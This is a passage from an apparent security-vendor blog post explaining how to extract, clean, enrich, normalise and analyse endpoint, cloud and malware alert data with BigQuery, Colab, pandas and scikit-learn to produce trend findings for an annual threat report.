environment for analyzing cyber threat data, allowing us to transform raw data into meaningful insights.\n\n# Exploration: Determining available data\n\nBefore diving into any sophisticated analyses, it's necessary to prepare by establishing an understanding of the data landscape we intend to study.\n\nHere's our approach:\n\n 1. **Identifying available data:** The first step is to ascertain what data is accessible. This could include malware phenomena, endpoint anomalies, cloud signals, etc. Confirming the availability of these data types is essential.\n 2. **Locating the data stores:** Determining the exact location of our data. Knowing where our data resides – whether in databases, data lakes, or other storage solutions – helps streamline the subsequent analysis process.\n 3. **Accessing the data:** It’s important to ensure that we have the necessary permissions or credentials to access the datasets we need. If we don’t, attempting to identify and request access from the resource owner is necessary.\n 4. **Understanding the data schema:** Comprehending the structure of our data is vital. Knowing the schema aids in planning the analysis process effectively.\n 5. **Evaluating data quality:** Just like any thorough analysis, assessing the quality of the data is crucial. We check whether the data is segmented and detailed enough for a meaningful trend analysis.\n\nThis phase is about ensuring that our analysis is based on solid and realistic foundations. For a report like the [Global Threat Report](http://www.elastic.co/gtr), we rely on rich and pertinent datasets such as:\n\n - **Cloud signal data:** This includes data from global Security Information and Event Management (SIEM) alerts, especially focusing on cloud platforms like AWS, GCP, and Azure. This data is often sourced from [public detection rules](https://github.com/elastic/detection-rules).\n - **Endpoint alert data:** Data collected from the global [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) alerts, incorporating a variety of public [endpoint behavior rules](https://github.com/elastic/protections-artifacts/tree/main/behavior).\n - **Malware data:** This involves data from global Elastic Defend alerts, enriched with [MalwareScore](https://www.elastic.co/blog/introducing-elastic-endpoint-security) and public [YARA rules](https://github.com/elastic/protections-artifacts/tree/main/yara).\n \n Each dataset is categorized and enriched for context with frameworks like [MITRE ATT&CK](https://attack.mitre.org/), Elastic Stack details, and customer insights. Storage solutions of Google Cloud Platform, such as BigQuery and Google Cloud Storage (GCS) buckets, provide a robust infrastructure for our analysis.\n\nIt's also important to set a data “freshness” threshold, excluding data not older than 365 days for an annual report, to ensure relevance and accuracy.\n\nLastly, remember to choose data that offers an unbiased perspective. Excluding or including internal data should be an intentional, strategic decision based on its relevance to your visibility.\n\nIn summary, selecting the right tools and datasets is fundamental to creating a comprehensive and insightful analysis. Each choice contributes uniquely to the overall effectiveness of the data analysis, ensuring that the final insights are both valuable and impactful.\n\n# Extraction: The first step in data analysis\n\nHaving identified and located the necessary data, the next step in our analytical journey is to extract this data from our storage solutions. This phase is critical, as it sets the stage for the in-depth analysis that follows.\n\n## Data extraction tools and techniques\n\nVarious tools and programming languages can be utilized for data extraction, including Python, R, Go, Jupyter Notebooks, and Looker Studio. Each tool offers unique advantages, and the choice depends on the specific needs of your analysis.\n\nIn our data extraction efforts, we have found the most success from a combination of [BigQuery](https://cloud.google.com/bigquery?hl=en), [Colab Notebooks](https://colab.google/), [buckets](https://cloud.google.com/storage/docs/json_api/v1/buckets), and [Google Workspace](https://workspace.google.com/) to extract the required data. Colab Notebooks, akin to Jupyter Notebooks, operate within Google's cloud environment, providing a seamless integration with other Google Cloud services.\n\n## BigQuery for data staging and querying\n\nIn the analysis process, a key step is to \"stage\" our datasets using BigQuery. This involves utilizing BigQuery queries to create and save objects, thereby making them reusable and shareable across our team. We achieve this by employing the [CREATE TABLE](https://hevodata.com/learn/google-bigquery-create-table/#b2) statement, which allows us to combine multiple [datasets](https://cloud.google.com/bigquery/docs/datasets-intro) such as endpoint behavior alerts, customer data, and rule data into a single, comprehensive dataset.\n\nThis consolidated dataset is then stored in a BigQuery table specifically designated for this purpose–for this example, we’ll refer to it as the “Global Threat Report” dataset. This approach is applied consistently across different types of data, including both cloud signals and malware datasets.\n\nThe newly created data table, for instance, might be named `elastic.global_threat_report.ep_behavior_raw`. This naming convention, defined by BigQuery, helps in organizing and locating the datasets effectively, which is crucial for the subsequent stages of the extraction process.\n\nAn example of a BigQuery query used in this process might look like this:\n\n```\nCREATE TABLE elastic.global_threat_report.ep_behavior_raw AS\nSELECT * FROM ...\n```\n\n\nDiagram for BigQuery query to an exported dataset table\n\nWe also use the [EXPORT DATA](https://cloud.google.com/bigquery/docs/reference/standard-sql/other-statements#export_data_statement) statement in BigQuery to transfer tables to other GCP services, like exporting them to Google Cloud Storage (GCS) buckets in [parquet file format](https://parquet.apache.org/).\n\n```\nEXPORT DATA\n OPTIONS (\n uri = 'gs://**/ep_behavior/*.parquet',\n format = 'parquet',\n overwrite = true\n )\nAS (\nSELECT * FROM `project.global_threat_report.2023_pre_norm_ep_behavior`\n)\n```\n\n## Colab Notebooks for loading staged datasets\n\n[Colab Notebooks](https://colab.research.google.com/) are instrumental in organizing our data extraction process. They allow for easy access and management of data scripts stored in platforms like GitHub and Google Drive.\n\nFor authentication and authorization, we use Google Workspace credentials, simplifying access to various Google Cloud services, including BigQuery and Colab Notebooks. Here's a basic example of how authentication is handled:\n\n\nDiagram for authentication and authorization between Google Cloud services\n\nFor those new to [Jupyter Notebooks](https://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/) or dataframes, it's beneficial to spend time becoming familiar with these tools. They are fundamental in any data analyst's toolkit, allowing for efficient code management, data analysis, and structuring. Mastery of these tools is key to effective data analysis.\n\nUpon creating a notebook in Google Colab, we're ready to extract our custom tables (such as project.global_threat_report.ep_behavior_raw) from BigQuery. This data is then loaded into Pandas Dataframes, a Python library that facilitates data manipulation and analysis. While handling large datasets with Python can be challenging, Google Colab provides robust virtual computing resources. If needed, these resources can be scaled up through the Google Cloud [Marketplace](https://console.cloud.google.com/marketplace/product/colab-marketplace-image-public/colab) or the Google Cloud Console, ensuring that even large datasets can be processed efficiently.\n\n## Essential Python libraries for data analysis\n\nIn our data analysis process, we utilize various Python libraries, each serving a specific purpose:\n\n| Library | Description |\n|-----------|---------------|\n|[datetime](https://docs.python.org/3/library/datetime.html) | Essential for handling all operations related to date and time in your data. It allows you to manipulate and format date and time information for analysis. |\n| [google.auth](https://google-auth.readthedocs.io/en/master/) | Manages authentication and access permissions, ensuring secure access to Google Cloud services. It's key for controlling who can access your data and services. |\n| [google.colab.auth](https://cloud.google.com/python/docs/reference/bigquery/latest) | Provides authentication for accessing Google Cloud services within Google Colab notebooks, enabling a secure connection to your cloud-based resources. |\n| [google.cloud.bigquery](https://cloud.google.com/python/docs/reference/bigquery/latest) | A tool for managing large datasets in Google Cloud's BigQuery service. It allows for efficient processing and analysis of massive amounts of data. |\n| [google.cloud.storage](https://cloud.google.com/python/docs/reference/storage/latest) | Used for storing and retrieving data in Google Cloud Storage. It's an ideal solution for handling various data files in the cloud. |\n| [gspread](https://docs.gspread.org/en/latest/) | Facilitates interaction with Google Spreadsheets, allowing for easy manipulation and analysis of spreadsheet data. |\n| [gspread.dataframe](https://pypi.org/project/gspread-dataframe/).set_with_dataframe | Syncs data between Pandas dataframes and Google Spreadsheets, enabling seamless data transfer and updating between these formats. |\n| [matplotlib](https://pypi.org/project/matplotlib/).pyplot.plt | A module in Matplotlib library for creating charts and graphs. It helps in visualizing data in a graphical format, making it easier to understand patterns and trends. |\n| [pandas](https://pandas.pydata.org/) | A fundamental tool for data manipulation and analysis in Python. It offers data structures and operations for manipulating numerical tables and time series. |\n| [pandas.gbq](https://pypi.org/project/pandas-gbq/).to_gbq | Enables the transfer of data from Pandas dataframes directly into Google BigQuery, streamlining the process of moving data into this cloud-based analytics platform. |\n| [pyarrow](https://arrow.apache.org/docs/python/index.html).parquet.pq | Allows for efficient storage and retrieval of data in the Parquet format, a columnar storage file format optimized for use with large datasets. |\n| [seaborn](https://seaborn.pydata.org/) | A Python visualization library based on Matplotlib that provides a high-level interface for drawing attractive and informative statistical graphics. |\n\nNext, we authenticate with BigQuery, and receive authorization to access our datasets as demonstrated earlier. By using Google Workspace credentials, we can easily access BigQuery and other Google Cloud services. The process typically involves a simple code snippet for authentication:\n\n```\nfrom google.colab import auth\nfrom google.cloud import bigquery\n\nauth.authenticate_user()\nproject_id = \"PROJECT_FROM_GCP\"\nclient = bigquery.Client(project=project_id)\n```\n\nWith authentication complete, we can then proceed to access and manipulate our data. Google Colab's integration with Google Cloud services simplifies this process, making it efficient and secure.\n\n## Organizing Colab Notebooks before analysis\n\nWhen working with Jupyter Notebooks, it's better to organize your notebook beforehand. Various stages of handling and manipulating data will be required, and staying organized will help you create a repeatable, comprehensive process. \n\nIn our notebooks, we use Jupyter Notebook headers to organize the code systematically. This structure allows for clear compartmentalization and the creation of collapsible sections, which is especially beneficial when dealing with complex data operations that require multiple steps. This methodical organization aids in navigating the notebook efficiently, ensuring that each step in the data extraction and analysis process is easily accessible and manageable.\n\nMoreover, while the workflow in a notebook might seem linear, it's often more dynamic. Data analysts frequently engage in multitasking, jumping between different sections as needed based on the data or results they encounter. Furthermore, new insights discovered in one step may influence another step’s process, leading to some back and forth before finishing the notebook.\n | \n \n## Extracting Our BigQuery datasets into dataframes\n\nAfter establishing the structure of our notebook and successfully authenticating with BigQuery, our next step is to retrieve the required datasets. This process sets the foundation for the rest of the report, as the information from these sources will form the basis of our analysis, similar to selecting the key components required for a comprehensive study.\n\nHere's an example of how we might fetch data from BigQuery:\n\n```\nimport datetime\n\ncurrent_year = datetime.datetime.now().year\nreb_dataset_id = f'project.global_threat_report.{current_year}_raw_ep_behavior'\nreb_table = client.list_rows(reb_dataset_id)\nreb_df = reb_table.to_dataframe() \n```\n\nThis snippet demonstrates a typical data retrieval process. We first define the dataset we're interested in (with the Global Threat Report, `project.global_threat_report.ep_behavior_raw` for the current year). Then, we use a BigQuery query to select the data from this dataset and load it into a Pandas DataFrame. This DataFrame will serve as the foundation for our subsequent data analysis steps.\n\n\nColab Notebook snippet for data extraction from BigQuery into Pandas dataframe\n\nThis process marks the completion of the extraction phase. We have successfully navigated BigQuery to select and retrieve the necessary datasets and load them in our notebooks within dataframes. The extraction phase is pivotal, as it not only involves gathering the data but also setting up the foundation for deeper analysis. It's the initial step in a larger journey of discovery, leading to the transformation phase, where we will uncover more detailed insights from the data.\n\nIn summary, this part of our data journey is about more than just collecting datasets; it's about structurally preparing them for the in-depth analysis that follows. This meticulous approach to organizing and executing the extraction phase sets the stage for the transformative insights that we aim to derive in the subsequent stages of our data analysis.\n\n# Pre-processing and transformation: The critical phase of data analysis\n\nThe transition from raw data to actionable insights involves a series of crucial steps in data processing. After extracting data, our focus shifts to refining it for analysis. Cybersecurity datasets often include various forms of noise, such as false positives and anomalies, which must be addressed to ensure accurate and relevant analysis.\n\nKey stages in data pre-processing and transformation:\n\n - **Data cleaning:** This stage involves filling NULL values, correcting data misalignments, and validating data types to ensure the dataset's integrity.\n - **Data enrichment:** In this step, additional context is added to the dataset. For example, incorporating third-party data, like malware reputations from sources such as VirusTotal, enhances the depth of analysis.\n - **Normalization:** This process standardizes the data to ensure consistency, which is particularly important for varied datasets like endpoint malware alerts.\n - **Anomaly detection:** Identifying and rectifying outliers or false positives is critical to maintain the accuracy of the dataset.\n - **Feature extraction:** The process of identifying meaningful, consistent data points that can be further extracted for analysis.\n\n## Embracing the art of data cleaning\n\nData cleaning is a fundamental step in preparing datasets for comprehensive analysis, especially in cybersecurity. This process involves a series of technical checks to ensure data integrity and reliability. Here are the specific steps:\n\n - **Mapping to MITRE ATT&CK framework:** Verify that all detection and response rules in the dataset are accurately mapped to the corresponding tactics and techniques in the MITRE ATT&CK framework. This check includes looking for NULL values or any inconsistencies in how the data aligns with the framework.\n\n - **Data type validation:** Confirm that the data types within the dataset are appropriate and consistent. For example, timestamps should be in a standardized datetime format. This step may involve converting string formats to datetime objects or verifying that numerical values are in the correct format.\n\n - **Completeness of critical data:** Ensure that no vital information is missing from the dataset. This includes checking for the presence of essential elements like SHA256 hashes or executable names in endpoint behavior logs. The absence of such data can lead to incomplete or biased analysis.\n\n - **Standardization across data formats:** Assess and implement standardization of data formats across the dataset to ensure uniformity. This might involve normalizing text formats, ensuring consistent capitalization, or standardizing date and time representations.\n\n - **Duplicate entry identification:** Identify and remove duplicate entries by examining unique identifiers such as XDR agent IDs or cluster IDs. This process might involve using functions to detect and remove duplicates, ensuring the uniqueness of each data entry.\n\n - **Exclusion of irrelevant internal data:** Locate and remove any internal data that might have inadvertently been included in the dataset. This step is crucial to prevent internal biases or irrelevant information from affecting the analysis.\n\n It is important to note that data cleaning or “scrubbing the data” is a continuous effort throughout our workflow. As we continue to peel back the layers of our data and wrangle it for various insights, it is expected that we identify additional changes.\n\n## Utilizing Pandas for data cleaning\n\nThe [Pandas](https://pandas.pydata.org/about/) library in Python offers several functionalities that are particularly useful for data cleaning in cybersecurity contexts. Some of these methods include:\n\n - `DataFrame.isnull()` or `DataFrame.notnull()` to identify missing values.\n - `DataFrame.drop_duplicates()` to remove duplicate rows.\n - Data type conversion methods like `pd.to_datetime()` for standardizing timestamp formats.\n - Utilizing boolean indexing to filter out irrelevant data based on specific criteria.\n\nA thorough understanding of the dataset is essential to determine the right cleaning methods. It may be necessary to explore the dataset preliminarily to identify specific areas requiring cleaning or transformation. Additional helpful methods and workflows can be found listed in [this](https://realpython.com/python-data-cleaning-numpy-pandas/) Real Python blog.\n\n## Feature extraction and enrichment\n\nFeature extraction and enrichment are core steps in data analysis, particularly in the context of cybersecurity. These processes involve transforming and augmenting the dataset to enhance its usefulness for analysis. \n\n - **Create new data from existing:** This is where we modify or use existing data to add additional columns or rows.\n - **Add new data from 3rd-party:** Here, we use existing data as a query reference for 3rd-party RESTful APIs which respond with additional data we can add to the datasets.\n\n## Feature extraction\n\nLet’s dig into a tangible example. Imagine we're presented with a bounty of publicly available YARA signatures that Elastic [shares](https://github.com/elastic/protections-artifacts/tree/main/yara/rules) with its community. These signatures trigger some of the endpoint malware alerts in our dataset. A consistent naming convention has been observed based on the rule name that, of course, shows up in the raw data: `OperationsSystem_MalwareCategory_MalwareFamily`. These names can be deconstructed to provide more specific insights. Leveraging Pandas, we can expertly slice and dice the data. For those who prefer doing this during the dataset staging phase with BigQuery, the combination of [SPLIT](https://cloud.google.com/bigquery/docs/reference/standard-sql/string_functions#split) and [OFFSET](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators#offset_and_ordinal) clauses can yield similar results:\n\n```\ndf[['OperatingSystem', 'MalwareCategory', 'MalwareFamily']] = df['yara_rule_name'].str.split('_', expand=True)\n```\n\n\nFeature extraction with our YARA data\n\nThere are additional approaches, methods, and processes to feature extraction in data analysis. We recommend consulting your stakeholder's wants/needs and exploring your data to help determine what is necessary for extraction and how.\n\n## Data enrichment\n\nData enrichment enhances the depth and context of cybersecurity datasets. One effective approach involves integrating external data sources to provide additional perspectives on the existing data. This can be particularly valuable in understanding and interpreting cybersecurity alerts.\n\n**Example of data enrichment: Integrating VirusTotal reputation data**\nA common method of data enrichment in cybersecurity involves incorporating reputation scores from external threat intelligence services like [VirusTotal](https://www.virustotal.com/gui/home/search) (VT). This process typically includes:\n\n 1. **Fetching reputation data:** Using an API key from VT, we can query for reputational data based on unique identifiers in our dataset, such as SHA256 hashes of binaries.\n\n```\nimport requests\n\ndef get_reputation(sha256, API_KEY, URL):\n params = {'apikey': API_KEY, 'resource': sha256}\n response = requests.get(URL, params=params)\n json_response = response.json()\n \n if json_response.get(\"response_code\") == 1:\n positives = json_response.get(\"positives\", 0)\n return classify_positives(positives)\n else:\n return \"unknown\"\n```\n\nIn this function, `classify_positives` is a custom function that classifies the reputation based on the number of antivirus engines that flagged the file as malicious.\n\n 2. **Adding reputation data to the dataset:** The reputation data fetched from VirusTotal is then integrated into the existing dataset. This is done by applying the `get_reputation` function to each relevant entry in the DataFrame.\n\n```\ndf['reputation'] = df['sha256'].apply(lambda x: get_reputation(x, API_KEY, URL))\n\n```\n\nHere, a new column named `reputation` is added to the dataframe, providing an additional layer of information about each binary based on its detection rate in VirusTotal.\n\nThis method of data enrichment is just one of many options available for enhancing cybersecurity threat data. By utilizing robust helper functions and tapping into external data repositories, analysts can significantly enrich their datasets. This enrichment allows for a more comprehensive understanding of the data, leading to a more informed and nuanced analysis. The techniques demonstrated here are part of a broader range of advanced data manipulation methods that can further refine cybersecurity data analysis.\n\n## Normalization\n\nEspecially when dealing with varied datasets in cybersecurity, such as endpoint alerts and cloud SIEM notifications, normalization may be required to get the most out of your data. \n\n**Understanding normalization:** At its core, normalization is about adjusting values measured on different scales to a common scale, ensuring that they are proportionally represented, and reducing redundancy. In the cybersecurity context, this means representing events or alerts in a manner that doesn't unintentionally amplify or reduce their significance.\n\nConsider our endpoint malware dataset. When analyzing trends, say, infections based on malware families or categories, we aim for an accurate representation. However, a single malware infection on an endpoint could generate multiple alerts depending on the Extended Detection and Response (XDR) system. If left unchecked, this could significantly skew our understanding of the threat landscape. To counteract this, we consider the Elastic agents, which are deployed as part of the XDR solution. Each endpoint has a unique agent, representing a single infection instance if malware is detected. Therefore, to normalize this dataset, we would \"flatten\" or adjust it based on unique agent IDs. This means, for our analysis, we'd consider the number of unique agent IDs affected by a specific malware family or category rather than the raw number of alerts.\n\n\nExample visualization of malware alert normalization by unique agents\n\nAs depicted in the image above, if we chose to not normalize the malware data in preparation for trend analysis, our key findings would depict inaccurate information. This inaccuracy could be sourced from a plethora of data inconsistencies such as generic YARA rules, programmatic operations that were flagged repeatedly on a single endpoint, and many more.\n\n**Diversifying the approach:** On the other hand, when dealing with endpoint behavior alerts or cloud alerts (from platforms like AWS, GCP, Azure, Google Workspace, and O365), our normalization approach might differ. These datasets could have their own nuances and may not require the same \"flattening\" technique used for malware alerts.\n\n**Conceptualizing normalization options:** Remember the goal of normalization is to reduce redundancy in your data. Make sure to keep your operations as atomic as possible in case you need to go back and tweak them later. This is especially true when performing both normalization and standardization. Sometimes these can be difficult to separate, and you may have to go back and forth between the two. Analysts have a wealth of options for these. From [Min-Max](https://www.geeksforgeeks.org/data-pre-processing-wit-sklearn-using-standard-and-minmax-scaler/) scaling, where values are shifted and rescaled to range between 0 and 1, to [Z-score](https://www.statology.org/z-score-python/) normalization (or standardization), where values are centered around zero and standard deviations from the mean. The choice of technique depends on the nature of the data and the specific requirements of the analysis. \n\nIn essence, normalization ensures that our cybersecurity analysis is based on a level playing field, giving stakeholders an accurate view of the threat environment without undue distortions. This is a critical step before trend analysis.\n\n## Anomaly detection: Refining the process of data analysis\n\nIn the realm of cybersecurity analytics, a one-size-fits-all approach to anomaly detection does not exist. The process is highly dependent on the specific characteristics of the data at hand. The primary goal is to identify and address outliers that could potentially distort the analysis. This requires a dynamic and adaptable methodology, where understanding the nuances of the dataset is crucial.\n\nAnomaly detection in cybersecurity involves exploring various techniques and methodologies, each suited to different types of data irregularities. The strategy is not to rigidly apply a single method but rather to use a deep understanding of the data to select the most appropriate technique for each situation. The emphasis is on flexibility and adaptability, ensuring that the approach chosen provides the clearest and most accurate insights into the data.\n\n### Statistical methods – The backbone of analysis:\n\nStatistical analysis is always an optional approach to anomaly detection, especially for cyber security data. By understanding the inherent distribution and central tendencies of our data, we can highlight values that deviate from the norm. A simple yet powerful method, the Z-score, gauges the distance of a data point from the mean in terms of standard deviations.\n\n```\nimport numpy as np\n\n# Derive Z-scores for data points in a feature\nz_scores = np.abs((df['mitre_technique'] - df['mitre_technique'].mean()) / df['mitre_technique'].std())\n\noutliers = df[z_scores > 3] # Conventionally, a Z-score above 3 signals an outlier\n```\n\n**Why this matters:** This method allows us to quantitatively gauge the significance of a data point's deviation. Such outliers can heavily skew aggregate metrics like mean or even influence machine learning model training detrimentally. Remember, outliers should not always be removed; it is all about context! Sometimes you may even be looking for the outliers specifically.\n\n**Key library:** While we utilize [NumPy](https://numpy.org/) above, [SciPy](https://scipy.org/) can also be employed for intricate statistical operations.\n\n## Aggregations and sorting – unraveling layers:\n\nData often presents itself in layers. By starting with a high-level view and gradually diving into specifics, we can locate inconsistencies or anomalies. When we aggregate by categories such as the MITRE ATT&CK tactic, and then delve deeper, we gradually uncover the finer details and potential anomalies as we go from technique to rule logic and alert context.\n\n```\n# Aggregating by tactics first\ntactic_agg = df.groupby('mitre_tactic').size().sort_values(ascending=False)\n```\n\nFrom here, we can identify the most common tactics and choose the tactic with the highest count. We then filter our data for this tactic to identify the most common technique associated with the most common tactic. Techniques often are more specific than tactics and thus add more explanation about what we may be observing. Following the same approach we can then filter for this specific technique, aggregate by rule and review that detection rule for more context. The goal here is to find “noisy” rules that may be skewing our dataset and thus related alerts need to be removed. This cycle can be repeated until outliers are removed and the percentages appear more accurate.\n\n**Why this matters:** This layered analysis approach ensures no stone is left unturned. By navigating from the general to the specific, we systematically weed out inconsistencies.\n\n**Key library:** Pandas remains the hero, equipped to handle data-wrangling chores with finesse.\n\n### Visualization – The lens of clarity:\n\nSometimes, the human eye, when aided with the right visual representation, can intuitively detect what even the most complex algorithms might miss. A boxplot, for instance, not only shows the central tendency and spread of data but distinctly marks outliers.\n\n```\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(12, 8))\nsns.boxplot(x='Malware Family', y='Malware Score', data=df)\nplt.title('Distribution of Malware Scores by Family')\nplt.show()\n```\n\n\nExample visualization of malware distribution scores by family from an example dataset\n\n**Why this matters:** Visualization transforms abstract data into tangible insights. It offers a perspective that's both holistic and granular, depending on the need.\n\n**Key library:** Seaborn, built atop Matplotlib, excels at turning data into visual stories.\n\n### Machine learning – The advanced guard:\n\nWhen traditional methods are insufficient, machine learning steps in, offering a predictive lens to anomalies. While many algorithms are designed to classify known patterns, some, like autoencoders in deep learning, learn to recreate 'normal' data, marking any deviation as an anomaly.\n\n**Why this matters:** As data complexity grows, the boundaries of what constitutes an anomaly become blurrier. Machine learning offers adaptive solutions that evolve with the data.\n\n**Key libraries:** [Scikit-learn](https://scikit-learn.org/stable/) is a treasure trove for user-friendly, classical machine learning techniques, while [PyTorch](https://pytorch.org/) brings the power of deep learning to the table.\n\nPerfecting anomaly detection in data analysis is similar to refining a complex skill through practice and iteration. The process often involves trial and error, with each iteration enhancing the analyst's familiarity with the dataset. This progressive understanding is key to ensuring that the final analysis is both robust and insightful. In data analysis, the journey of exploration and refinement is as valuable as the final outcome itself.\n\nBefore proceeding to in-depth trend analysis, it's very important to ensure that the data is thoroughly pre-processed and transformed. Just as precision and reliability are essential in any meticulous task, they are equally critical in data analysis. The steps of cleaning, normalizing, enriching, and removing anomalies from the groundwork for deriving meaningful insights. Without these careful preparations, the analysis could range from slightly inaccurate to significantly misleading. It's only when the data is properly refined and free of distortions that it can reveal its true value, leading to reliable and actionable insights in trend analysis.\n\n# Trend analysis: Unveiling patterns in data\n\nIn the dynamic field of cybersecurity where threat actors continually evolve their tactics, techniques, and procedures (TTPs), staying ahead of emerging threats is critical. Trend analysis serves as a vital tool in this regard, offering a way to identify and understand patterns and behaviors in cyber threats over time.\n\nBy utilizing the MITRE ATT&CK framework, cybersecurity professionals have a structured and standardized approach to analyzing and categorizing these evolving threats. This framework aids in systematically identifying patterns in attack methodologies, enabling defenders to anticipate and respond to changes in adversary behaviors effectively.\n\nTrend analysis, through the lens of the MITRE ATT&CK framework, transforms raw cybersecurity telemetry into actionable intelligence. It allows analysts to track the evolution of attack strategies and to adapt their defense mechanisms accordingly, ensuring a proactive stance in cybersecurity management.\n\n## Beginning with a broad overview: Aggregation and sorting\n\nCommencing our analysis with a bird's eye view is paramount. This panoramic perspective allows us to first pinpoint the broader tactics in play before delving into the more granular techniques and underlying detection rules.\n\n**Top tactics:** By aggregating our data based on MITRE ATT&CK tactics, we can discern the overarching strategies adversaries lean toward. This paints a picture of their primary objectives, be it initial access, execution, or exfiltration.\n\n```\ntop_tactics = df.groupby('mitre_tactic').size()\n .sort_values(ascending=False)\n```\n\n**Zooming into techniques:** Once we've identified a prominent tactic, we can then funnel our attention to the techniques linked to that tactic. This reveals the specific modus operandi of adversaries.\n\n```\nchosen_tactic = 'Execution'\n\ntechniques_under_tactic = df[df['mitre_tactic'] == chosen_tactic]\ntop_techniques = techniques_under_tactic.groupby('mitre_technique').size()\n .sort_values(ascending=False)\n```\n\n**Detection rules and logic:** With our spotlight on a specific technique, it's time to delve deeper, identifying the detection rules that triggered alerts. This not only showcases what was detected, but by reviewing the detection logic, we also gain an understanding of the precise behaviors and patterns that were flagged.\n\n```\nchosen_technique = 'Scripting'\n\nrules_for_technique = techniques_under_tactic[techniques_under_tactic['mitre_technique'] == chosen_technique]\n\ntop_rules = rules_for_technique\n .groupby('detection_rule').size().sort_values(ascending=False)\n```\n\nThis hierarchical, cascading approach is akin to peeling an onion. With each layer, we expose more intricate details, refining our perspective and sharpening our insights.\n\n## The power of time: Time series analysis\n\nIn the realm of cybersecurity, time isn't just a metric; it's a narrative. Timestamps, often overlooked, are goldmines of insights. Time series analysis allows us to plot events over time, revealing patterns, spikes, or lulls that might be indicative of adversary campaigns, specific attack waves, or dormancy periods.\n\nFor instance, plotting endpoint malware alerts over time can unveil an adversary's operational hours or spotlight a synchronized, multi-vector attack:\n\n```\nimport matplotlib.pyplot as plt\n\n# Extract and plot endpoint alerts over time\ndf.set_index('timestamp')['endpoint_alert'].resample('D').count().plot()\nplt.title('Endpoint Malware Alerts Over Time')\nplt.xlabel('Time')\nplt.ylabel('Alert Count')\nplt.show()\n```\n\nTime series analysis doesn't just highlight \"when\" but often provides insights into the \"why\" behind certain spikes or anomalies. It aids in correlating external events (like the release of a new exploit) to internal data trends.\n\n## Correlation analysis\n\nUnderstanding relationships between different sets of data can offer valuable insights. For instance, a spike in one type of alert could correlate with another type of activity in the system, shedding light on multi-stage attack campaigns or diversion strategies.\n\n```\n# Finding correlation between an increase in login attempts and data exfiltration activities\ncorrelation_value = df['login_attempts'].corr(df['data_exfil_activity'])\n```\n\nThis analysis, with the help of pandas [corr](https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.corr.html), can help in discerning whether multiple seemingly isolated activities are part of a coordinated attack chain.\n\nCorrelation also does not have to be metric-driven either. When analyzing threats, it is easy to find value and new insights by comparing older findings to the new ones.\n\n## Machine learning & anomaly detection\n\nWith the vast volume of data, manual analysis becomes impractical. Machine learning can assist in identifying patterns and anomalies that might escape the human eye. Algorithms like [Isolation Forest](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.IsolationForest.html) or [K-nearest neighbor](https://scikit-learn.org/stable/modules/neighbors.html)(KNN) are commonly used to spot deviations or clusters of commonly related data.\n\n```\nfrom sklearn.ensemble import IsolationForest\n\n# Assuming 'feature_set' contains relevant metrics for analysis\nclf = IsolationForest(contamination=0.05)\nanomalies = clf.fit_predict(feature_set)\n```\n\nHere, the anomalies variable will flag data points that deviate from the norm, helping analysts pinpoint unusual behavior swiftly.\n\n## Behavioral patterns & endpoint data analysis\n\nAnalyzing endpoint behavioral data collected from detection rules allows us to unearth overarching patterns and trends that can be indicative of broader threat landscapes, cyber campaigns, or evolving attacker TTPs.\n\n**Tactic progression patterns:** By monitoring the sequence of detected behaviors over time, we can spot patterns in how adversaries move through their attack chain. For instance, if there's a consistent trend where initial access techniques are followed by execution and then lateral movement, it's indicative of a common attacker playbook being employed.\n\n**Command-line trend analysis:** Even within malicious command-line arguments, certain patterns or sequences can emerge. Monitoring the most frequently detected malicious arguments can give insights into favored attack tools or scripts.\n\nExample:\n\n```\n# Most frequently detected malicious command lines\ntop_malicious_commands = df.groupby('malicious_command_line').size()\n .sort_values(ascending=False).head(10)\n```\n\n**Process interaction trends:** While individual parent-child process relationships can be malicious, spotting trends in these interactions can hint at widespread malware campaigns or attacker TTPs. For instance, if a large subset of endpoints is showing the same unusual process interaction, it might suggest a common threat.\n\n**Temporal behavior patterns:** Just as with other types of data, the temporal aspect of endpoint behavioral data can be enlightening. Analyzing the frequency and timing of certain malicious behaviors can hint at attacker operational hours or campaign durations.\n\nExample:\n\n```\n# Analyzing frequency of a specific malicious behavior over time\nmonthly_data = df.pivot_table(index='timestamp', columns='tactic', values='count', aggfunc='sum').resample('M').sum()\n\nax = monthly_data[['execution', 'defense-evasion']].plot(kind='bar', stacked=False, figsize=(12,6))\n\nplt.title(\"Frequency of 'execution' and 'defense-evasion' Tactics Over Time\")\n\nplt.ylabel(\"Count\")\nax.set_xticklabels([x.strftime('%B-%Y') for x in monthly_data.index])\nplt.xticks(rotation=45)\nplt.tight_layout()\nplt.show()\n```\n\n\nNote: This image is from example data and not from the Global Threat Report\n\nBy aggregating and analyzing endpoint behavioral data at a macro level, we don't just identify isolated threats but can spot waves, trends, and emerging patterns. This broader perspective empowers cybersecurity teams to anticipate, prepare for, and counter large-scale cyber threats more effectively.\n\nWhile these are some examples of how to perform trend analysis, there is no right or wrong approach. Every analyst has their own preference or set of questions they or stakeholders may want to ask. Here are some additional questions or queries analysts may have for cybersecurity data when doing trend analysis.\n\n - What are the top three tactics being leveraged by adversaries this quarter?\n - Which detection rules are triggering the most, and is there a common thread?\n - Are there any time-based patterns in endpoint alerts, possibly hinting at an adversary's timezone?\n - How have cloud alerts evolved with the migration of more services to the cloud?\n - Which malware families are becoming more prevalent, and what might be the cause?\n - Do the data patterns suggest any seasonality, like increased activities towards year-end?\n - Are there correlations between external events and spikes in cyber activities?\n - How does the weekday data differ from weekends in terms of alerts and attacks?\n - Which organizational assets are most targeted, and are their defenses up-to-date?\n - Are there any signs of internal threats or unusual behaviors among privileged accounts?\n\nTrend analysis in cybersecurity is a dynamic process. While we've laid down some foundational techniques and questions, there are myriad ways to approach this vast domain. Each analyst may have their preferences, tools, and methodologies, and that's perfectly fine. The essence lies in continuously evolving and adapting to our approach while cognizantly being aware of the ever-changing threat landscape for each ecosystem exposed to threats.\n\n# Reduction: Streamlining for clarity\n\nHaving progressed through the initial stages of our data analysis, we now enter the next phase: reduction. This step is about refining and concentrating our comprehensive data into a more digestible and focused format.\n\nRecap of the Analysis Journey So Far:\n\n - **Extraction:** The initial phase involved setting up our Google Cloud environment and selecting relevant datasets for our analysis.\n - **Pre-processing and transformation:** At this stage, the data was extracted, processed, and transformed within our Colab notebooks, 